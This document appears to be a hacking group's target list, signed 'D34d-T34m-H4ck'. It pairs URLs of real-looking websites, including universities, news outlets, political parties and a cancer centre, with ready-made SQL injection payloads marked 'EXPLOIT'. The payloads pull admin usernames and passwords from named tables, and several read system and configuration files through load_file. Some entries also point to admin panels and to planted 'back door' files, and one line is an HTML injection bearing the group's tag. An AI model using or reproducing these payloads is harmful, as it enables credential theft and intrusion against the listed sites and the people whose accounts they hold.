http://www.creadorescolombianos.com/contenido.php?id=
-1+union+select+0,1,2,3,4,5,6,7,8--
EXPLOIT:
-1+union+select+0,concat(id,0x3a,username,0x3a,password),unhex(hex(@@version)),3,4,5,6,7,8+from+usuarios--
__________________________________________________________________________________________________________________________
http://www.elconfidencialmusical.com/noticias.php?id=
-1+union+all+select+0,1,version(),3,4,5--
EXPLOIT:
-1+union+all+select+0,1,password,3,4,5+from+users--
_________________________________________________________________________________________________________________________
http://www.eshci.com/contenido.php?id=
-1+union+all+select+0,1,2,3
EXPLOIT:
-1+union+all+select+0,concat(login,0x3a,password),2,3+from+usuarios--
____________________________________________________________________________________________________________________________
http://www.sportsfeatures.com/PressPoint/show.php?id=
null+union+all/**/select+0,1,2,3--
EXPLOIT:
-1+union+all+select+0,1,concat(kAdminID,0x3a,tAdmin,0x3a,tPassword,0x3a,tName,0x3a,nRank,0x3a,dModifiedDate,0x3a,nActive),3+from+admins
__________________________________________________________________________________________________________________________
http://www.unabvirtual.edu.co/programa.php?id=
-1+union+select+0,1,2,3,4,5,6,7,8,9,10,11,12,13--
EXPLOIT:
-1+union+all+select+0,1,2,3,4,5,6,7,8,9,10,concat(login,0x3a,pass),12,13+from+usuarios--
__________________________________________________________________________________________________________________________
http://www.metroeast.org/articles/show.php?id=
-1+union+all+select+0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--
EXPLOIT:
-1+union+all+select+0,1,2,3,concat(name,0x3a,p_text,0x3a,u_permit),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+user
__________________________________________________________________________________________________________________________
http://www.sufficiencyeconomy.org/show.php?Id=
-1+union+all+select+0,1,2,3,4,5,6,7,8,9,10,11,12,13,14--
EXPLOIT:
-1+union+all+select+0,1,2,3,4,concat(db_login,0x3a,db_pwd%20),6,7,8,9,10,11,12,13,14+from+useradmin--
__________________________________________________________________________________________________________________________
http://guiasyscouts6.com/secciones.php?id=
-1+union+all+select+0,1,2
EXPLOIT:
-1+union+all+select+0,concat(usuario,0x3a,clave),2+from+usuario
__________________________________________________________________________________________________________________________
http://www.dontshake.ca/news/news.php?id=
-1+union+all+select+0,1,2,3,4,5,6,7,8,9,10,11--
EXPLOIT:
-1+union+all+select+0,1,concat(name,0x3a,password),3,4,5,6,7,8,9,10,11+from+users
___________________________________________________________________________________________________________________________
http://www.cageprisoners.com/admin
http://www.cageprisoners.com/articles.php?id=
-1+union+all+select+0,1,2,3,4,5--
EXPLOIT:
-1+union+all+select+0,1,concat(id,0x3a,username,0x3a,password,0x3a,email,0x3a,level),3,4,5+from+admins--
__________________________________________________________________________________________________________________________
http://www.partidosocialista.com.ar/PS/adm/front/gestor.php
http://www.partidosocialista.com.ar/PS/seccion.php?go=vernota&i=
-1+union+all+select+0,1,2,3,4,5,6,7,8,9--
EXPLOIT:
-1+union+all+select+0,1,concat(uh_usuario,0x3d,uh_password),database(),unhex(hex(@@version)),5,user(),7,8,9+from+usuarios_head--
__________________________________________________________________________________________________________________________
http://www.baibrama.cult.cu/pages/noticia.php?id=-1+union+all+select+0,concat(usuario,0x3d,pass,0x3d,nivelacceso),2,3,4,5,6+from+usuarios--
http://www.aetical.com/detallenoticia.php?ref=-1+union+all+select+concat(login,0x3d,pwd),2,3,4,5+from+usuarios
http://www.conservation.org.co/noticiadetalle.php?idnot=-1/**/union/**/select+0,concat(useradmin,0x3a,pssw,0x3a,conpssw),2,3,4,5,6,7,8,9,10,11+from+adminuuser--
http://www.ucr.ac.cr/mostrar_noticia.php?ID=-1+union+all+select+0,concat(clave,0x3a,usuario),2,3,4,5,6,7,8,9,10+from+usuarios+where%20id=2--
http://www.ampadvantage.com.my/site/news_.php?id=92%20and%201=0%20union%20all%20select%201,2,3,4,concat_ws(0x3d,username,password)%20from%20admin--
---------------------------------------------------------------------------------------------
http://www.vannichile.cl/inc__home_flash.php
http://www.href.cl/sitio/docs/inc__home_flash.php
http://www.centrocanceruc.cl/pacientes/nuestrosMedicos_resp.php?id=-1+union+select+0,1,2,3,concat(usuario,0x3d,password)+From+usuarios+limit+2,1--
http://www.centrocanceruc.cl/admin/yolovivi_archivos/ideas.php (Back door)
http://www.centrocanceruc.cl/medicos/stdom.php (back door)
---------------------------------------------------------------------------------------------------------------------
http://www.lasemana.es/periodico/noticia.php?cod=-1+union+all+select+0,1,2,load_file(0x2f6574632f706173737764),column_name,5,6,7,8,9,10,11,12+from+information_schema.columns+where+table_name=char(117,%20115,%20101,114)+limit+2,1--
-----------------------------------------------------------------------------
http://www.planetariochile.cl/actividades.php?idNoticia=102+and+1=0+union+select+all+1,2,load_file(0x2f7661722f7777772f68746d6c2f664e6f74696369612e706870),4,5,6,7,8,9,10,11,12,13
---------------------------------------------------------------------------------
http://www.viviendas.cl/admin/tbl_adminlist.php
http://www.viviendas.cl/destacados_detalle.php?idp=-1+union+all+select+1,2,3,concat_ws(0x3d,adm_id,adm_usuario,adm_clave),5,6,7,8,9,10,11,12,13,14,15+from+tbl_admin%20where%20adm_id=3--
-----------------------------------------------------------------------------------------------
http://www.mdu.cl/documentos/ver.php?id=-98%20and%201=1%20+union+select+0,concat(email,0x3d,password),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,22,24,25,26,27,28,29,30,31,32,33,34,35,36+from+usuarios+limit+2,1--
-------------------------------------------------------------------------------------------------------------------------------
http://www.regiondeloslagos.cl/consejo/actas2006.php?anio_busca=-999999999+union+all+select+0,1,2,3,4,5,load_file(0x433a5c4172636869766f732064652070726f6772616d615c4170616368652047726f75705c417061636865325c6874646f63735c696e636c7564655c636f6e6578696f6e5f64622e706870)--
-------------------------------------------------------------------------------
http://www.bostoncollege.cl/index.php?op=colegios/c_principal&col=-1+union+select+0,concat_ws(0x3d,user(),database(),version())--
--------------------------------------------------------------------------
http://www.nikoncenter.cl/catalogo.php?id=-1+union+select+concat(id,0x3d,nombre,0x3d,user,0x3d,pswd)+from+usuarios--
--------------------------------------------------------------------------
http://www.alltek.cl/detalle.php?catalogoID=-1+union+select+0,1,2,group_concat(column_name),4,5+from+information_schema.columns+where+table_name=char(103,112,95,117,115,117,97,114,105,111,115)+limit--
-----------------------------------------------------------------------
http://www.ing.puc.cl/esp/alumpostgrado/investigacion/inv.html?act=isi&year=%3Ch1%3EDead-team-H4ck%3Ch1%3E
by D34d-T34m-H4ck